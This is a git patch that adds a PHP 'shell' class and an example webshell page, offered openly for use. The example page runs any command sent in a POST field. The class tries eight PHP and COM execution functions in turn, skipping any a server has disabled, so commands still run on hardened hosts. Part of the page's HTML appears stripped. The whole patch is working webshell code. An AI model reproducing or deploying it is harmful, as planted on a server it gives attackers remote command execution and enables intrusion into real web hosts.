From ed02323e8522174b9e8833045fa7d3f919fe3995 Mon Sep 17 00:00:00 2001 From: xiaoqidun Date: Fri, 7 Aug 2020 12:11:17 +0800 Subject: [PATCH] =?UTF-8?q?feat(=E9=A1=B9=E7=9B=AE=E6=96=87=E4=BB=B6):=20?= =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E9=A1=B9=E7=9B=AE=E6=96=87=E4=BB=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitignore | 1 + README.md | 17 +++- example.php | 103 ++++++++++++++++++++ shell.class.php | 251 ++++++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 371 insertions(+), 1 deletion(-) create mode 100644 .gitignore create mode 100644 example.php create mode 100644 shell.class.php diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..9f11b75 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.idea/ diff --git a/README.md b/README.md index fd0662a..25d6cc8 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,17 @@ -# shell +# 简而言之 大概是PHP最强大的SHELL执行类了 +# 系统兼容 +PHP 5.4 + (主要是用了中括号数组,改掉中括号数组可以要求更低) +# 使用说明 +## 示范代码 +```php + +``` +## example.php +这是一个使用shell.class.php实现的webshell工具,用于shell类演示。 +# 授权说明 +使用本类库你唯一需要做的就是把LICENSE文件往你用到的项目中拷贝一份。 \ No newline at end of file diff --git a/example.php b/example.php new file mode 100644 index 0000000..d87e865 --- /dev/null +++ b/example.php @@ -0,0 +1,103 @@ + + */ +$command = isset($_POST['command']) ? strval($_POST['command']) : ""; +if ($command !== "") { + require 'shell.class.php'; + echo shell::command($command, "echo pwd", true); + exit; +} +?> + + + web shell + + + + + +

+

+

+    CopyRight © 2017- xiaoqidun@gmail.com All Rights Reserved
+

+
+
\ No newline at end of file
diff --git a/shell.class.php b/shell.class.php
new file mode 100644
index 0000000..f9e43b3
--- /dev/null
+++ b/shell.class.php
@@ -0,0 +1,251 @@
+
+ */
+
+class shell
+{
+    public static $version = 'v1.0.0';
+
+    public static function Convert($string, $to = 'utf-8', $from = 'auto,cp936')
+    {
+        $func = 'mb_convert_encoding';
+        if (!function_exists($func)) {
+            return $string;
+        }
+        return $func($string, $to, $from);
+    }
+
+    public static function Command($command, $testCommand = null, $convert = false)
+    {
+        $typeA = 'proc_open';
+        $typeB = 'shell_exec';
+        $typeC = 'exec';
+        $typeD = 'system';
+        $typeE = 'passthru';
+        $typeF = 'popen';
+        $typeG = 'pcntl_exec';
+        $typeH = 'com';
+        $typeRank = [
+            $typeH,
+            $typeA,
+            $typeB,
+            $typeD,
+            $typeE,
+            $typeC,
+            $typeF,
+            $typeG
+        ];
+        if (!is_array($command)) $command = [$command];
+        if (!is_array($testCommand) && $testCommand !== null) $testCommand = [$testCommand];
+        $commandFunctions = [
+            $typeA => [
+                'command' =>
+                    function ($command) {
+                        $cmd = "exec " . self::GetShellFile();
+                        if (defined('PHP_WINDOWS_VERSION_BUILD')) {
+                            $cmd = self::GetShellFile();
+                        }
+                        if (!is_resource($sh = proc_open($cmd, [
+                            0 =>
+                                ["pipe", "r"],
+                            1 =>
+                                ["pipe", "w"]
+                        ], $pipes))) {
+                            return false;
+                        }
+                        foreach ($command as $commandLine) {
+                            fwrite($pipes[0], $commandLine . PHP_EOL);
+                        }
+                        fclose($pipes[0]);
+                        $result = stream_get_contents($pipes[1]);
+                        fclose($pipes[1]);
+                        proc_close($sh);
+                        return $result;
+                    },
+                'function' =>
+                    [
+                        'proc_open',
+                        'stream_get_contents'
+                    ]
+            ],
+            $typeB => [
+                'command' => function ($command) {
+                    $commandResult = "";
+                    foreach ($command as $commandLine) {
+                        $commandResult .= shell_exec($commandLine);
+                    }
+                    return $commandResult;
+                },
+                'function' => [
+                    'shell_exec'
+                ]
+            ],
+            $typeC => [
+                'command' => function ($command) {
+                    $commandResult = "";
+                    foreach ($command as $commandLine) {
+                        exec($commandLine, $commandOutput);
+                        $commandResult .= implode(PHP_EOL, $commandOutput);
+                    }
+                    return $commandResult;
+                },
+                'function' => [
+                    'exec'
+                ]
+            ],
+            $typeD => [
+                'command' => function ($command) {
+                    ob_start();
+                    foreach ($command as $commandLine) {
+                        system($commandLine);
+                    }
+                    $commandResult = ob_get_clean();
+                    return $commandResult;
+                },
+                'function' => [
+                    'system',
+                    'ob_start',
+                    'ob_get_clean'
+                ]
+            ],
+            $typeE => [
+                'command' => function ($command) {
+                    ob_start();
+                    foreach ($command as $commandLine) {
+                        passthru($commandLine);
+                    }
+                    $commandResult = ob_get_clean();
+                    return $commandResult;
+                },
+                'function' => [
+                    'passthru',
+                    'ob_start',
+                    'ob_get_clean'
+                ]
+            ],
+            $typeF => [
+                'command' => function ($command) {
+                    $commandResult = "";
+                    foreach ($command as $commandLine) {
+                        $p = popen($commandLine, "r");
+                        while (!feof($p)) {
+                            $commandResult .= fgets($p);
+                        }
+                    }
+                },
+                'function' => [
+                    'popen'
+                ]
+            ],
+            $typeG => [
+                'command' => function ($command) {
+                    $command[] = '';
+                    $outputFile = tempnam(null, 'commandOutput_');
+                    $outputFilePipe = sprintf(" >> %s 2>&1%s", $outputFile, PHP_EOL);
+                    $commandString = implode($outputFilePipe, $command);
+                    $commandProcess = pcntl_fork();
+                    if ($commandProcess == 0) {
+                        pcntl_exec(self::GetShellFile(), ["-c", $commandString]);
+                    }
+                    pcntl_waitpid($commandProcess, $status);
+                    $commandResult = file_get_contents($outputFile);
+                    unlink($outputFile);
+                    return $commandResult;
+                },
+                'function' => [
+                    'pcntl_exec',
+                    'pcntl_fork',
+                    'pcntl_waitpid'
+                ]
+            ],
+            $typeH => [
+                'command' => function ($command) {
+                    $commandResult = "";
+                    try {
+                        $ws = new \COM("wscript.shell");
+                        $exec = $ws->Exec(self::GetShellFile());
+                        foreach ($command as $commandLine) {
+                            $exec->StdIn->WriteLine("$commandLine");
+                        }
+                        $exec->StdIn->WriteLine("exit");
+                        $exec->StdIn->Close();
+                        while (0 === $exec->Status) {
+                            time_nanosleep(0, 1e8);
+                        }
+                        $commandResult = $exec->StdOut->ReadAll() . $exec->StdErr->ReadAll();
+                    } catch (\Exception $exception) {
+
+                    }
+                    return $commandResult;
+                },
+                'class' => [
+                    '\COM'
+                ]
+            ]
+        ];
+        foreach ($commandFunctions as $tag => $item) {
+            if (isset($item['class'])) {
+                foreach ($item['class'] as $cls) {
+                    if (!class_exists($cls)) {
+                        unset($func);
+                        unset($commandFunctions[$tag]);
+                    }
+                }
+            }
+            if (isset($item['function'])) {
+                foreach ($item['function'] as $func) {
+                    if (!function_exists($func)) {
+                        unset($func);
+                        unset($commandFunctions[$tag]);
+                        break;
+                    }
+                    unset($func);
+                }
+            }
+            unset($tag);
+            unset($item);
+        }
+        if ($testCommand !== null) {
+            foreach ($commandFunctions as $tag => $item) {
+                $commandResult = $item['command']($testCommand);
+                if (1 > strlen($commandResult)) {
+                    unset($commandFunctions[$tag]);
+                }
+                unset($tag);
+                unset($item);
+            }
+        }
+        foreach ($typeRank as $type) {
+            if (isset($commandFunctions[$type])) {
+                $commandReturn = $commandFunctions[$type]['command']($command);
+                if ($convert) {
+                    return self::Convert($commandReturn);
+                }
+                return $commandReturn;
+            }
+            unset($type);
+        }
+        return false;
+    }
+
+    public static function GetShellFile()
+    {
+        $shellFileList = [
+            'C:\Windows\System32\cmd.exe',
+            'C:\Windows\SysWOW64\cmd.exe',
+            '/system/bin/sh',
+            '/bin/bash',
+            '/bin/sh'
+        ];
+        foreach ($shellFileList as $shellFile) {
+            if (is_executable($shellFile)) {
+                return $shellFile;
+            }
+        }
+        if (defined('PHP_WINDOWS_VERSION_BUILD')) {
+            return 'cmd.exe';
+        }
+        return 'sh';
+    }
+}
\ No newline at end of file